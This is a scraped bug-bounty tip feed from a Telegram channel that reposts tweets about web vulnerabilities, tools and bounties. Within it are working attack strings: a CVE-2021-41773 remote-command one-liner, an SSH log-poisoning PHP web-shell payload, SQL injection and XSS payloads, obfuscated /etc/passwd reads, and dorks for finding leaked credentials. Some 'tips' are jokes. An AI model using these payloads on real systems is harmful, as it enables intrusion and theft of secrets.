Bug Hunting Hub
796 subscribers
13 photos
361 links
The source of insights for Bug Hunters. The channel is driven by bot, curated by twitter.com/makrushind
instagram.com/makrush.in
Download Telegram
to view and join the conversation
#BugBountyTips of the Day
🤔 10 Types of Web Vulnerabilities that are Often Missed Nice overview of vuln classes by @hakluke and @farah_hawaa 1. HTTP/2 Smuggling 2. XXE via Office Open XML Parsers 3. SSRF via XSS in PDF Generators 4. XSS via SVG Files ... #bugbountytips https://t.co/w08K3ad2Ux
---
El Webinar Gratuito: "Inyección SQL" está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics 🌎 https://t.co/yynzPyot87 https://t.co/jsFzDuXksP
---
Hello Friends, Project Morya is officially made public now. 🚀 GitHub Link : https://t.co/Y7bglBmta8 Project Morya is just a collection of bash scripts that automate your recon process + send notification on your server (example : on discord) #bugbounty #bugbountytips #recon
---
Got extra bonus for XSS in JSON with WAF bypass on private @intigriti splitting my payload like this: firstname : <img src=' lastname: 'onerror=print()> Result: "firstname":"<img src ='","lastname":"'onerror=print()>" JSON in src tag triggers the error: BOOM!! #bugbountytips https://t.co/eMqmQJ9gFJ
---
Hello guys, it's been long time since my last write-up, so I have written a write-up on my find about 403 Restrictions bypass to get pagespeed admin access. hope you like it 😊✌️. https://t.co/s5MD67JUTK #bugbounty #bugbountytips #ethicalhacking #cybersecurity
#BugBountyTips of the Day
Account Takeover through Password Reset : 1. Capture the request of forgot password [email protected] and tamper mail id and change to [email protected] Finally will get victim reset link to attacker mail #bugbounty #wapt #cybersecurity
---
Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 All-in-One reproduction for CVE-2021-41773 https://t.co/xeC7X4xeX1 #Vulhub #infosec #security #bugbountytip https://t.co/DhD8BFin4o
---
Scanning for CVE-2021-41773 (Apache 2.4.49 - Path Traversal) using template shared by @daffainfo Template - https://t.co/CX1j1ku5Ot #hackwithautomation #pentest #bugbounty https://t.co/DPSeLu3kA6
---
A lot of companies are using OKTA for authentication these days. Use these GitHub dorks to find some secrets:) OKTA_CLIENT_ORGURL= OKTA_CLIENT_TOKEN= OKTA_OAUTH2_CLIENTSECRET= OKTA_OAUTH2_CLIENTID= OKTA_AUTHN_GROUPID= #bugbountytips
---
many have questioned. this poc.. hi I've made the nuclei-templates ahead of time you can check them out here @pdnuclei https://t.co/vtJOxs2UCq #nuclei #automation #bugbounty
---
Just got worked exploit PoC for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) with my collab again @yabeow #bugbountytips 👀 https://t.co/oGHtbWwKHT
---
5k reputations swag from @Hacker0x01 #bugbounty https://t.co/JkVYmaF7V8
#BugBountyTips of the Day
Here is a new write-up on my blog about a recent P1 found on an external program :) https://t.co/vfKIKs8JjT Thanks @infosec_au for the help🤝 #BugBounty #SharingIsCaring
---
Update : CVE-2021-41773 POC as RCE 🔥👇💥 One Liner: cat file | while read host do ; do curl --silent --path-as-is --data "echo;id" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep "uid" && echo "$host \033[0;31mVuln\n"|| echo "$host \033[0;32mNot\n";done #infosec #bugbounty
#BugBountyTips of the Day
CVE-2021-42013 - Apache 2.4.49/2.4.50 - Path Traversal by nvn1729 "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient" - https://t.co/AK4CQpDGA4 Nuclei Template - https://t.co/SOY8iTU8Bk #hackwithautomation #bugbounty #appsec #pentest https://t.co/dH7StiF3Sd
---
Wait What? 🔥 Apache CVE 2021-41773 One Liner Windows Box: curl -sk —path-as-is " http://host/cgi-bin/.%2e/.%2e/.%2e/.%2e/Windows/System32/cmd.exe?/c+calc.exe" #infosec #bugbounty #Apache #cve
---
🔥🤑🤑 Neat bug bounty I just got. You can hack Google and use their API to make their search engine search for things: curl https://t.co/DQV3mlvADS{QUERY HERE} Nice little £20,160 bounty! Thank you 😻😻 All public APIs are vulns Follow for more #bugbounty tips! https://t.co/GBiv7j8nhK
---
So I reported a RCE to a domain owned by IBM (@Hacker0x01 program) . It was Triaged and now closed as informative because the servers are owned by Amazon. Scope rules say 'domains owned by IBM' Imagine all companies use this excuse. 😂 😂 #bugbountytips #BugBounty
---
Always test JSON body parameters. In my case I bypassed email verification. #bugbountytips https://t.co/pDzPfkJOl7
---
Expand your attack surface by grabbing SSL certificates from ip addresses, match these with your Bug Bounty targets. I'd recommend running this technique on cloud providers such as AWS/Azure/GCP ranges using https://t.co/uvvFVrKTXC cero [CIDR] (cero 0.0.0.0/0) #bugbountytips
#BugBountyTips of the Day
We created a list of the Top 10 most popular Bug Bounty courses and training programs for beginners #bugbounty #learning #infosec https://t.co/j7tKfLvdIV https://t.co/H7YAAqpVfd
---
Another hit by github recon..$$$ Thanks @GodfatherOrwa for sharing tips and keywords. Dork:- " https://t.co/cS7P78DU7v" password Github is ❤️ @ADITYASHENDE17 @e11i0t_4lders0n @theXSSrat #bugbounty #githubrecon #bugcrowd https://t.co/OK824fTHI4
---
Alhamdulillah, I got my highest bounty from @bugcrowd. Thank you so much Almighty Allah . Also thank you so much to the #bugbounty community and those legends who are sharing their secret tips for newbies @GodfatherOrwa @theXSSrat @imranHudaA @remonsec @AkashHamal0x01 #bugbounty https://t.co/oItpiFP9UL
---
Happy to reach 6K reputation at @Hacker0x01 🥶 #BugBounty https://t.co/dMPrumq0oH
#BugBountyTips of the Day
When doing #bugbounty hunting, I struggle a lot with decision paralysis around what to hack on and when to pivot targets. I wrote up what I've been doing to combat this difficulty. Hopefully it helps you as well! https://t.co/8q6cpKXgJh #togetherwehitharder
---
Who of you enjoys escalating vulnerabilities to RCE? 👀 We asked @sec_r0, who was so kind to share one his tricks 🧙‍♂️ #bugbountytips 👇 https://t.co/GeRizKk6gr
---
SSTI XSS Finder: Just a simple automation tool for newbie 🤠 Tool Link: https://t.co/yFpUgJghQv Manually hunting for the same i had shown in my #YouTuber video, must check out 😎 Video Link: https://t.co/G1UODp1CYZ #HR51KDB #bugbountytips #bugbountytip #xss #ssti #infosec #hack
#BugBountyTips of the Day
I was awarded $9000 for Blind XSS Big thanks to @IAmMandatory for @XssHunter <3 #bugbounty #blindxss #xss #infosec https://t.co/f3KN0F6vA6
---
Qu1cksc0pe - All-in-One Static Malware Analysis Tool https://t.co/Vo2P8NOsxN #cybersecurity #bugbountytips #hacking #tools https://t.co/ULGRNYQHKU
---
🚨🚨 Another 10K giveaway 50 Like - Burp Suite Ext Dev - 10 Coupons 100 Likes - SOP Zine - 10 Coupons 150 Likes - Web Auth Zines- 10 Coupons 200 Likes - Bundle - 3 Coupons Thanks to @FeedHive_io for post conditions functionality. #Security #Learn365 #bugbountytips #bugbounty
---
Command Injection: ~Find Your subdomains ~cat subdomains.txt | httpx | gau | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ~ ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ~search for ”uid” in burp proxy intercept #bugbountytips #bugbounty https://t.co/6vPQeIyZXI
---
Pro Tips to get followers in Infosec: 1) Fake #bugbounty tips 2) Giveaways and Swags on retweets 3) Copy paste payload & write blog on it 4) Asking for followers and saying we are family of 10k 5) Worst one is to tell me that you work in Infosec without actually saying it
---
Misconfigured Reset password that leads to Account Takeover by 'Aditya Sharma' bounty: $5000 Aug 2021 https://t.co/JNxgap268M #AccountTakeover #BugBounty #BugBountyTip #BugBountyTips
---
Found many github leaks using this dork Filename:.ipynb target password @ADITYASHENDE17 @GodfatherOrwa @e11i0t_4lders0n @theXSSrat @cyph3r_asr @purab_parihar #bugbounty #bugbountytips #githubrecon
---
Wordpress juicy endpoints (beginners) 1) wp-includes [directory] 2) index.php 3) wp-login.php 4) wp-links-opml.php 5) wp-activate.php 6) wp-blog-header.php 7) wp-cron.php 8) wp-links.php 9) wp-mail.php 10) xmlrpc.php 11) wp-settings.php 12) wp-trackback.php #bugbountytips #Share
---
API Penetration Examples https://t.co/fWFSUHXTrK #bugbounty #bugbountytips #API #infosec #cybersecurity
#BugBountyTips of the Day
🤑 Found a neat RCE Medium bug on Windows 11 🔥 If the computer is unlocked, you can plug in a bluetooth keyboard and execute any commands you want remotely💻🤯 Nice little $500 from Microsoft for this 🔥 Follow for more tips on bug bounties #bugbounty #hacking #infosec https://t.co/RvOnhS7nsL
---
Reflected XSS a short flyer. Reviewed by our XSS Guru, Mr @theXSSrat, thank you my friend. Download: https://t.co/kvIzV9y62V Join my newsletter: https://t.co/mjNKfR71hP #infosec #appsec #zines #bugbountytips #bugbounty #bugbountytip #Learn365 #security #cybersecurity #hackers https://t.co/LbaQERjfGc
---
Mi Curso Virtual Forense con Autopsy está disponible en video #hacking #cybersecurity #bugbounty #osint #forensics Más información en: https://t.co/Xae4e9T6Gd https://t.co/2xXdeshBlm
---
Facebook Bug bounty 🥳🥳 #bugbounty #infosec thanks @fbsecurity https://t.co/ie3inZWa7l
---
While Looking For DOM based XSS make sure where input Reflected In my case <svg/onload=alert()> -> not worked -prompt(1)-- -> worked #bugbountytips #bugbounty https://t.co/63OR1hlKm2
---
I made a python 🐍 script to #bypass IP source #restrictions using HTTP headers. This is really useful in #bug #bounties, #pentest and #CTF. https://t.co/AdBhor1m7Z #bugbountytips #BugBounty
---
Authorization bypass using .json #bugbountytips #pentest #infosec https://t.co/57SPmkVcaT
#BugBountyTips of the Day
Mi Curso Virtual de Hacking Ético está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics Más información en: https://t.co/DTtWCqUNav https://t.co/zLszgas0YE
---
I just published 500$ Bug: Sensitive Data Exposure to Broken Access Control leads, How I able to take over any… https://t.co/MxEeuj3nCO #bugbounty #programming #hacking
---
1. User-A capture request to like on his private goal activity 2. Replace activity UUID by User-B's activity UUID **UUID is revealed via some graphql endpoints** 3. User-B's activity got liked #bugbounty #bugbountytip #hackerone https://t.co/DYp2gp5v4m
#BugBountyTips of the Day
Google Hacking for Penetration Testers & Bug Hunters by Jonny Long is a GEM 💎 A detailed and from scratch guide. I started a long time back with this and use it till date. Here -> https://t.co/anvXSFzwpQ #security #infosec #appsec #bugbountytips #bugbounty #learn365 #hackers https://t.co/FXvjboNUzN
---
Disponible el video del Webinar Gratuito: "Romper Contraseñas con Tablas Arco Iris" #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/Z9YRtclEDz https://t.co/TUmJjEpgM5
---
If you are just starting out definitely check out https://t.co/GF1auAA6wU I've been going back to it for years for help when I'm stuck. #bugbountytips #bugbounty #infosec #ssrf #hacking Thanks @SynackRedTeam https://t.co/uTXobLAUoP
---
My 0-day accepted from forti , if anyone has a target use fortigate your are vuln with unath bug :) #BugBounty #bugbountytips https://t.co/MmNz7xZe9r
---
.@SynackRedTeam 2021 Swags Unlocked 💥 Here we go . . . Thank you @SynackRedTeam for these awesome swags 😍 #BugBounty #swags https://t.co/SmUNbHkt1L
---
Linux #commandline Cheat Sheet #linux #cheatsheet #hacking #bugbountytips https://t.co/dN9ZmJhRwa
---
#bugbountytip #BugBounty Multiple RCE Wordpress $300,000 1. Design Flaws 2. SQL Injection 3. The Traditional Path to RCE More.. https://t.co/RqXdyvqBet https://t.co/4tEFQstkfS
#BugBountyTips of the Day
Apache <= 2.4.48 - Mod_Proxy SSRF (CVE-2021-40438) Nuclei Template - https://t.co/vbQANmrdI0 Reference - https://t.co/rliMLU9DDg #apache #cve #ssrf #bugbounty #pentest #appsec https://t.co/4q57lclGBh
---
Ey yo @DHLPaket, habt ihr ein #BugBounty Programm und/oder einen Security Kontakt für mich? Ich würde euch gerne mitteilen, wie Euch massivst viele unmittelbar personenbezogene Daten verloren gehen.
---
2500 Reputation at Hackerone platforms Finding 333 Vulnerabilities found in 37 company! If you need learn to become bughunter let's dm me! I have a proof-on-concept and videos for finding bugs. #bugbounty #bugbountytips #cybersecurity https://t.co/rnWBx11SXX
---
Fuxploider - File Upload Vulnerability Scanner - This tool automates the process of detecting and exploiting file upload forms flaws. - Repo: https://t.co/h906eJUk5D - #CyberSecurity #infosec #CTF #BugBounty #bugbountytips https://t.co/SAvHqzaNmi
#BugBountyTips of the Day
Happy to score a nice bounty with @thedawgyg #BugBounty https://t.co/D9OIvrGdmT
---
Basic recon - Shodan dork ssl: https://t.co/pel4aFbi0R 200 ok - Got a few login pages. - Github dork " https://t.co/pel4aFbi0R" "password" - Default Security mechanism with Gmail login, tried on other login pages. BOOM! Internal admin access! #recontips #bugbountytips #recon
---
A way to find many CSRFs.. #bugbounty #bugbountytip https://t.co/fqpqIa1n4l
---
Disponible el video del Webinar Gratuito: "Wireshark". #hacking #cybersecurity #bugbounty #osint #forensics https://t.co/aqsiEHyTSu https://t.co/miW6fFa831
---
Cross site scripting(xss)- Reflected Triaged. payload: "><svg+onload=confirm(document.domain)> #bugbounty https://t.co/ecdLpgKmCC
---
Join Ben Sadeghipour @NahamSec for Introduction to Web Application Hacking & Bug Bounty on Nov. 8-10. Participants are given hands-on experience by learning each vulnerability category & completing a series of challenges. https://t.co/jPrqrTltcz #cybersecurity #bugbounty #appsec https://t.co/e0YSu7b7og
---
Did you know that your Interactsh server may also be used to query cloud metadata services? Reference - https://t.co/ysyONf7BAK #ssrf #apache #appsec #bugbounty #pentest https://t.co/fgBKGcRX1D
---
Google is much more than the dorks! Use cache function when the results from the web archives are not enough. #bugbountytips https://t.co/U0CL8d30nu
---
MOSINT - gather information about the target email https://t.co/ANI9HTW4qT #infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #programming #maltego #OSINT #email #bugbounty https://t.co/4kQNQ8DpC6
#BugBountyTips of the Day
Account takeover is lob 😍😍❤️❤️ #hacking #bugbounty https://t.co/DgRlaHUREC
---
Reconftw - Simple Script For Full Recon https://t.co/Av1ZRyn1kA #Pentesting #BugBounty #BruteForce #CyberSecurity #Infosec https://t.co/PPfJB7JG2J
---
Jira Unauthenticated Access to Screens Exploit- {{base-url}}/rest/api/2/screens Note:- Depends on the Program, some accept it and some consider this Informational. #Jira #Infosec #BugBounty
---
Packet-Sniffer - A pure-Python Network Packet Sniffing Tool https://t.co/Jmk3FoPpFP #cybersecurity #bugbountytips #hacking #tools https://t.co/7ugRkmKjc9
---
Hacking easily by switching match/replace rules on and off? 😱 Yeap, that's an absolutely valid technique brought to you by @isira_adithya 👨‍🎤 #bugbountytips 👇 https://t.co/62FcNgxf3i
---
Mi Curso Virtual de Hacking con Kali Linux está disponible en video. #hacking #cybersecurity #bugbounty #osint #forensics Más información en: https://t.co/lsfm4jifRQ https://t.co/kclEQ782QA
#BugBountyTips of the Day
How to find the SQL-Injection Using automatic scrapper & SQLMap 1. Scrape using SECTOOL 2. Save output in your folder 3. Automatic SQLMap command find vulnerable : SQLMap -r /root/target_urls.txt --dbs -v3 https://t.co/AdnXhzhrtS #bugbountytips #bugbounty #cybersecuritytips https://t.co/Tamekx9Qr5
---
Origin - Don't Remember Properly #bugbounty #bugbountytip #bugcrowd #cybersecuritytips #privilegesescalation https://t.co/txFe7rjPEH
---
#bugbountytip #bugbounty RCE on Starbucks Singapore and more for $5600 1. Recon 2. Exploitation 3. Impact More.. https://t.co/fr1HJJ1DjL https://t.co/tpX8XMN2zm
---
Try access /admin path without follow redirects {tampering}: ~ https://t.co/sqZAxnhejK –> HTTP 302 (redirect to login page) ~ https://t.co/inYB0wcxF5 -> HTTP 200 OK ~ https://t.co/VjNg01bwtL -> HTTP 200 OK ~ https://t.co/nSBXKSmqNi -> HTTP 200 OK #bugbounty #bugbountytips
#BugBountyTips of the Day
4 most important @Burp_Suite features. - Proxy - Repeater - Intruder - Extender HD image : https://t.co/9xDkrNFtnN Please retweet if you like. Short description 👇👇👇👇 #infosec #zines #bugbountytips #bugbounty #Learn365 #security #hackers https://t.co/DXJsoMf1Ny
---
Alhamdulillah I earned $1,764.70 for my submission on @bugcrowd #ItTakesACrowd #Api pentesting on On-Demand Program #Love to pwn Api function #bugbounty https://t.co/AIfJL6M1nb
---
Find Open Redirect quickly: cat domains.txt | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew #BugBounty #bugbountytip #bugbountytips
---
GitLab disclosed a bug submitted by @wcbowling: https://t.co/LmajrxfjMk - Bounty: $16,000 #hackerone #bugbounty https://t.co/LTA6oReKyD
---
#bugbountytip #bugbounty How I got 9000 USD by hacking into iCloud 1. Apple and the iCloud 2. The XSS Vulnerability 3. The POC More.. https://t.co/HfpGU0EBwU https://t.co/IS00yTTv3d
#BugBountyTips of the Day
Took a little #BugBounty vacation to London, important to refresh after a successful period. https://t.co/ixxaDpGOcj
---
Epic Bug bounty tool 'Commix': commix -u https://t.co/hbIJ2xbkcf.* --data"$data" --cookie="$cookie" --batch -v 3 #bugbounty #bugbountytips #commix #hacker #hackerspace #hacking https://t.co/efvSyomfZx
---
So as you may know I always save half of my #bugbounty payments to cover the down payment for a house. Well we covered the down payment for a house. We put an offer in which got accepted, paid a surveyor, solicitor etc. It's all good. We're getting the keys in 2 weeks!!!!! https://t.co/ZHD0gmxq0B
---
#bugbountytip 1 Authentication Bypass Due Signup Enabled Target/signup.php Target/index.php?page=signup✔️ #bugbountytip 2 In username , email parameter Sleep Payload orwa' AND (SELECT 6377 FROM (SELECT(SLEEP(5)))hLTl)-- Happy Hunting Dears https://t.co/vk1v2qmc0I
---
🔨 Break @syscoin and earn up to $25,000! The $SYS #NEVM #bugbounty is now live. Join in now 👇 https://t.co/qku2JmoqBB #hackers #whitehacker #evm #smartcontracts #nevm https://t.co/Xdg8r62bqh
---
Found a subdomainthat hadn't been found before with a few vulns. I mainly just use simple websites for finding subdomains. Like https://t.co/szBWgqwQAK and https://t.co/RkpPsM7Tco What do you use? #bugbountytips #bugbounty @SynackRedTeam https://t.co/HFVGAxVnDl
---
Made 1.5k+ reps & $$,$$$ from single target on 5 months Persistency is the main key If I hadn't seen @Ahmad_Halabi_ on Thanks list, I wouldn't have gone this far😀 Huge Thanks to @Ahmad_Halabi_ @zseano & other researchers for providing great resources on community #bugbounty https://t.co/C9X36OQVsf
#BugBountyTips of the Day
Some more Google Dorks to find Private VDP: inurl:bug-bounty intext:cash rewards site:security.*.com intext:bug bounty site:security.*.* inurl: bounty vulnerability detection program reward intext:Cryptocurrency Exchange intext:Bug bounty #bugbounty #infosec #bugbountytips 1/2
---
LFI Bypass: 1) /usr/bin/cat /etc/passwd == /???/???/c?t$IFS/?t?/p?s?wd 2) /*/?at$IFS/???/???swd 3)/****/?at$IFS/???/*swd 4)/****/?at$IFS/???/*******swd (IFS is Internal Field Separator = [space], [tab] or a [newline]) #bugbounty #bugbountytips #hacker
---
Bug:origin ip using ssrf Bounty:800$ Tip: try ip in browser from burpcollab sometime leads to direct access to the server without waf @ADITYASHENDE17 @sechunt3r @1ndianl33t @sunilyedla2 @niiconsulting @remonsec @e11i0t_4lders0n @GodfatherOrwa @theXSSrat @naglinagli #bugbounty https://t.co/cL7cX6irkr
#BugBountyTips of the Day
كتاب اختبار اختراق المواقع "تطبيقات الويب" the web application hackers handbook رابط الكتاب https://t.co/keW5q4zkfW #الامن_السيبراني #CyberSecurity #BugBounty https://t.co/Huywq22IW8
---
#ثريد الربح من إكتشاف الثغرات 😎 لكل راغب بدخول هذا المجال، - الثريد مخصص لك - نهاية الثريد في حاجة جميلة 😍👍🏻 ريتويت ولايك ❤️🔁 #BugBounty #ثريد_الخميس
---
Karma_V2 - A Passive Open Source Intelligence (OSINT) Automated Reconnaissance (Framework) https://t.co/eilqUTVI6y #Pentesting #BugBounty #OSINT #CyberSecurity #Infosec https://t.co/PnIHtQW08M
#BugBountyTips of the Day
Alhamdulillah Since September I have been working on Recon to try out as many tools as possible and learn different tactics so today I am happy to publish my workflow If there are anything wrong please tell me to fix it and learn from you #recon #bugbounty #cybersecurity https://t.co/MN0jbBzhSq
---
Token Spray - Automate the token validation using newly introduced self-contained nuclei template support 🎉🎉 Read the details here - https://t.co/L6tTOuUtTz #hackwithautomation #bugbounty #pentest #osint https://t.co/97g9zqQ01g
---
LFI to RCE via SSH Log File Poisoning (PHP) url: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log payload: ssh <?php system($_GET['c']);?>@<target_ip> execute RCE: http//10.10.10.10/index.php?file=../../../../../../../var/log/auth.log&c=id #bugbounty
---
https://t.co/Q61fZ6v2hZ #bugbounty https://t.co/SFQ95suGfi
---
My new XSS Bypass Filter! "/><svg+svg+svg\/\/On+OnLoAd=confirm(1)> Please let me know if some researcher found this before me in the comments! Thank you :) And happy hacking! #bugbounty #bugbountytips #0day #exploit #xss #hacking #hackers #bugs https://t.co/mmax2jXMXh
---
Another Bounty after 2 months total 4000 rupees , ₹3000 is for hard-core GitHub leak thanks to @GodfatherOrwa for his blog & ₹1000 is for reflected XSS on 2 subdomain thanks to @HackerGautam for his script to automate XSS finding #bugbounty #bugbountytip #infosec https://t.co/PPYtpyHwuq